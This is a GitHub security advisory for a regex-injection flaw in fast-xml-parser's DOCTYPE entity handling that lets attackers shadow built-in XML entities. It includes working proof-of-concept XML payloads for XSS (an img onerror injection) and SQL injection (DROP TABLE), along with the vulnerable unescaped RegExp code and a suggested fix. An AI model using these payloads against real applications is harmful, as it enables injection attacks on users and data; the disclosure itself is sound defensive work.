CVE-2026-25896
ADVISORY - githubSummary
Entity encoding bypass via regex injection in DOCTYPE entity names
Summary
A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (<, >, &, ", ') with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.
Details
The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.
In DocTypeReader.js, entity names are passed directly to RegExp():
entities[entityName] = {
regx: RegExp(`&${entityName};`, "g"),
val: val
};
An entity named l. produces the regex /&l.;/g where . matches any character, including the t in <. Since DOCTYPE entities are replaced before built-in entities, this shadows < entirely.
The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:
// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+"; // no dot
Shadowing all 5 built-in entities
| Entity name | Regex created | Shadows |
|---|---|---|
l. |
/&l.;/g |
< |
g. |
/&g.;/g |
> |
am. |
/&am.;/g |
& |
quo. |
/&quo.;/g |
" |
apo. |
/&apo.;/g |
' |
PoC
const { XMLParser } = require("fast-xml-parser");
const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
<text>Hello <b>World</b></text>
</root>`;
const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>
No special parser options needed - processEntities: true is the default.
When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.
& can be shadowed too:
const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&Brien'</root>`;
const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'
Impact
This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.
- Default config, no special options
- Attacker can replace any
</>/&/"/'with arbitrary strings - Direct XSS vector when parsed XML content is rendered in a page
- v5 and v6 both affected
Suggested fix
Escape regex metacharacters before constructing the replacement regex:
const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
regx: RegExp(`&${escaped};`, "g"),
val: val
};
For v6, add . to the blacklist in validateEntityName:
const specialChar = "!?\\/[].{}^&*()<>|+";
Severity
Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.
NIST
3.9
CVSS SCORE
9.3criticalGitHub
3.9